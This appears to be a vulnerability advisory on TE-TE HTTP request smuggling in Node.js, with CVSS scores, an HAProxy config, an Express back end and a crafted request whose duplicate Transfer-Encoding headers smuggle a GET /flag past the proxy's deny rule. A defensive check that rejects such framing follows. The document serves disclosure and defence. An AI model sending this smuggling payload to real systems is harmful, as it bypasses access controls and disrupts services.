CVSS3: 6.5 Medium
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: LOW
Integrity Impact: LOW
Availability Impact: NONE
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

CVSS2: 6.4 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: PARTIAL
Integrity Impact: PARTIAL
Availability Impact: NONE
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:N

EPSS: 0.003 Low
Percentile: 64.7%
Summary:
Potential HTTP Request Smuggling exists in Node.js: an attacker can send two copies of the same header field to perform a TE-TE HTTP Request Smuggling attack.
Description:
Node.js allows the same header field to appear more than once in an HTTP request. For example, we can send two Transfer-Encoding header fields, even if one of them is an invalid header field. Node.js only honours the first Transfer-Encoding header and ignores the one that follows. Because a front-end proxy may interpret this pair of headers differently and therefore frame the message differently, this leads to a potential HTTP Request Smuggling.
For example, using HAProxy to perform the TE-TE attack (HAProxy version 1.5.3). The haproxy.cfg below forbids access to the /flag URI:
global
    daemon
    maxconn 256

defaults
    mode http
    timeout connect 5000ms
    timeout client 50000ms
    timeout server 50000ms

frontend http-in
    bind *:80
    default_backend servers
    acl url_403 path_beg -i /flag
    http-request deny if url_403

backend servers
    server server1 127.0.0.1:8080 maxconn 32
app.js
// Minimal Express back end sitting behind HAProxy on port 8080.
var express = require('express');
var bodyParser = require('body-parser');
var app = express();

// Parse JSON and URL-encoded bodies (explicit form of the deprecated bodyParser() call).
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

app.get('/', function (req, res) {
  res.send('Hello World!');
});

// The resource HAProxy is configured to deny; a smuggled GET reaches it directly.
app.get('/flag', function (req, res) {
  res.send('flag is 1a2b3c4d5e6f');
});

app.post('/', function (req, res) {
  res.send('Hello World!');
});

app.listen(8080, function () {
  console.log('Example app listening on port 8080!');
});
The following HTTP request bypasses the HAProxy restriction on /flag:
POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked
Transfer-Encoding: chunked-false

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1
foo: x
It is possible to smuggle the request and disrupt the user experience.
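As an added example (not code from the report, HAProxy or Node.js), the check below inspects a raw request head the way a hardened front end would and rejects the duplicate or malformed Transfer-Encoding headers the report relies on; `inspectFraming`, the list of accepted codings and the constructed clean request are assumptions of this example.

```javascript
// Added example: reject ambiguous message framing before forwarding a request.
const ALLOWED_CODINGS = ['chunked', 'gzip', 'x-gzip', 'deflate', 'compress', 'x-compress'];

function inspectFraming(rawRequest) {
  // The head ends at the first blank line; tolerate bare LF as well as CRLF.
  const headEnd = rawRequest.search(/\r?\n\r?\n/);
  const head = headEnd === -1 ? rawRequest : rawRequest.slice(0, headEnd);
  const lines = head.split(/\r?\n/);
  lines.shift(); // request line

  const te = [];
  const cl = [];
  for (const line of lines) {
    const idx = line.indexOf(':');
    if (idx === -1) return { ok: false, reason: 'malformed header line' };
    const name = line.slice(0, idx).trim().toLowerCase();
    const value = line.slice(idx + 1).trim();
    if (name === 'transfer-encoding') te.push(value);
    else if (name === 'content-length') cl.push(value);
  }

  // RFC 7230 section 3.3.3: Transfer-Encoding, if present, must be a single
  // well-formed list ending in "chunked", with no Content-Length beside it.
  // Anything else lets a proxy and Node.js choose different message boundaries.
  if (te.length > 1) return { ok: false, reason: 'multiple Transfer-Encoding headers' };
  if (te.length === 1) {
    const codings = te[0].split(',').map((c) => c.trim().toLowerCase());
    const unknown = codings.find((c) => !ALLOWED_CODINGS.includes(c));
    if (unknown !== undefined) return { ok: false, reason: 'unknown transfer coding: ' + unknown };
    if (codings[codings.length - 1] !== 'chunked') return { ok: false, reason: 'final coding is not chunked' };
    if (cl.length > 0) return { ok: false, reason: 'Transfer-Encoding together with Content-Length' };
  }
  if (cl.some((v) => !/^\d+$/.test(v))) return { ok: false, reason: 'non-numeric Content-Length' };
  if (new Set(cl).size > 1) return { ok: false, reason: 'conflicting Content-Length values' };
  return { ok: true, reason: 'unambiguous framing' };
}

// The request from the report above, as raw bytes with CRLF line endings.
const SMUGGLED_REQUEST = [
  'POST / HTTP/1.1', 'Host: 127.0.0.1',
  'Transfer-Encoding: chunked', 'Transfer-Encoding: chunked-false',
  '', '1', 'A', '0', '', 'GET /flag HTTP/1.1', 'Host: 127.0.0.1', 'foo: x',
].join('\r\n');
// A constructed, well-framed request for comparison.
const CLEAN_REQUEST = 'POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 3\r\n\r\nabc';

console.log(inspectFraming(SMUGGLED_REQUEST)); // { ok: false, reason: 'multiple Transfer-Encoding headers' }
console.log(inspectFraming(CLEAN_REQUEST));    // { ok: true, reason: 'unambiguous framing' }
```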